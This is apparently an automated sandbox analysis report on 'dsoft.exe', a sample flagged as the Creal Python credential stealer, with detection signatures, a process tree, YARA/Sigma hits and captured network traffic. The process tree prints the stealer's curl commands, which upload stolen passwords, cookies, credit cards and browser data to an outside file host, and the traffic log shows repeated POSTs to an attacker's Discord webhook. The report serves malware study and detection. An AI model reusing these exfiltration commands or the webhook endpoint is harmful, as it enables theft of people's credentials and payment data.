Edit tour

Windows Analysis Report
dsoft.exe

Overview

General Information

Sample name:	dsoft.exe
Analysis ID:	1582061
MD5:	42b4b335289128a94efb934d0080dab3
SHA1:	fed72d52ff0a2231301410c80aee03cf0285b09e
SHA256:	aa3f588529429795e1e0e72e430aef58a9190e72e01db662775e2c0d3c8a4420
Tags:	de-pumpedexeuser-abuse_ch
Infos:

Detection

Python Stealer, Creal Stealer

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected Creal Stealer

AI detected suspicious sample

Drops PE files to the startup folder

Found pyInstaller with non standard icon

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal communication platform credentials (via file / registry access)

Yara detected Generic Python Stealer

Binary contains a suspicious time stamp

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

dsoft.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\dsoft.exe" MD5: 42B4B335289128A94EFB934D0080DAB3)

dsoft.exe (PID: 7128 cmdline: "C:\Users\user\Desktop\dsoft.exe" MD5: 42B4B335289128A94EFB934D0080DAB3)

cmd.exe (PID: 6232 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6356 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 4548 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3284 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 3896 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 2324 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 1216 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 6156 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 2920 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 2200 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 3588 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 5684 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5272 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 1364 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

dsoft.exe (PID: 2248 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe" MD5: 42B4B335289128A94EFB934D0080DAB3)

dsoft.exe (PID: 4336 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe" MD5: 42B4B335289128A94EFB934D0080DAB3)

cmd.exe (PID: 5088 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4456 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6376 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 3616 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7032 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 5104 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 5888 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 1732 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7092 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 7104 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 3284 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 8 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

curl.exe (PID: 6308 cmdline: curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.2534735683.000002948994D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000E.00000003.2420158932.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000E.00000003.2449803777.000001FA5CE4D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000E.00000002.2716449819.000001FA5D4E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
0000000E.00000003.2676477196.000001FA5CC7A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GenericPythonStealer	Yara detected Generic Python Stealer	Joe Security
0000000E.00000003.2676477196.000001FA5CC7A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
00000001.00000003.2534412343.000002948994A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
00000001.00000003.2251126528.000002948994A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
00000001.00000002.2570813243.0000029489E90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
00000001.00000003.2535617412.00000294895DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
Process Memory Space: dsoft.exe PID: 7128	JoeSecurity_GenericPythonStealer	Yara detected Generic Python Stealer	Joe Security
Process Memory Space: dsoft.exe PID: 7128	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
Process Memory Space: dsoft.exe PID: 7128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dsoft.exe PID: 4336	JoeSecurity_CrealStealer	Yara detected Creal Stealer	Joe Security
Click to see the 9 entries

Sigma Signatures

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\dsoft.exe, ProcessId: 7128, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dsoft.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\dsoft.exe", ParentImage: C:\Users\user\Desktop\dsoft.exe, ParentProcessId: 7128, ParentProcessName: dsoft.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile", ProcessId: 3284, ProcessName: cmd.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://discord.gift/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: dsoft.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: geolocation-db.com

Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.14.70.245:443 -> 192.168.2.4:49805 version: TLS 1.2

Source: dsoft.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: dsoft.exe, 00000000.00000003.1985477905.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159177221.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160087254.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: dsoft.exe, 00000000.00000003.1985604407.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159279158.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: dsoft.exe, 00000000.00000003.1986492471.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160087254.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: dsoft.exe, 00000000.00000003.1986609914.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160261628.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\select.pdb source: dsoft.exe, 00000000.00000003.1992158737.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2166596083.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: dsoft.exe, 00000000.00000003.1994313352.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168290335.000001463F1F2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_uuid.pdb source: dsoft.exe, 00000000.00000003.1987314194.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2161628059.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: dsoft.exe, 00000000.00000003.1986851728.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160707465.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-310\Release\_win32sysloader.pdb source: dsoft.exe, 00000000.00000003.1995076039.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168703723.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-cpython-310\Release\win32trace.pdb source: dsoft.exe, 00000000.00000003.1996740060.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2168910308.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: dsoft.exe, 00000000.00000003.1985304722.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159039587.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: dsoft.exe, 00000000.00000003.1985304722.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159039587.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: dsoft.exe, 00000000.00000003.1986770676.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160557351.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: dsoft.exe, 00000000.00000003.1986688582.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2160421599.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: dsoft.exe, 00000000.00000003.1985736440.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159384277.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: dsoft.exe, 00000000.00000003.1985477905.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159177221.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: dsoft.exe, 00000000.00000003.1986386897.00000177161E7000.00000004.00000020.00020000.00000000.sdmp, dsoft.exe, 0000000A.00000003.2159977076.000001463F1EA000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\

Source: Joe Sandbox View	IP Address: 162.159.138.232 162.159.138.232
Source: Joe Sandbox View	IP Address: 45.112.123.126 45.112.123.126
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 420Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
Source: global traffic	HTTP traffic detected: POST /api/webhooks/1229145117030486016/NQ2uXKhRK5qXx6KyXPMsHxeSepNPgw-XGytvxLPiTkjstD1PhyXZx-vnSqKWA2DwPXjL HTTP/1.1Accept-Encoding: identityContent-Length: 1787Host: discord.comContent-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Connection: close
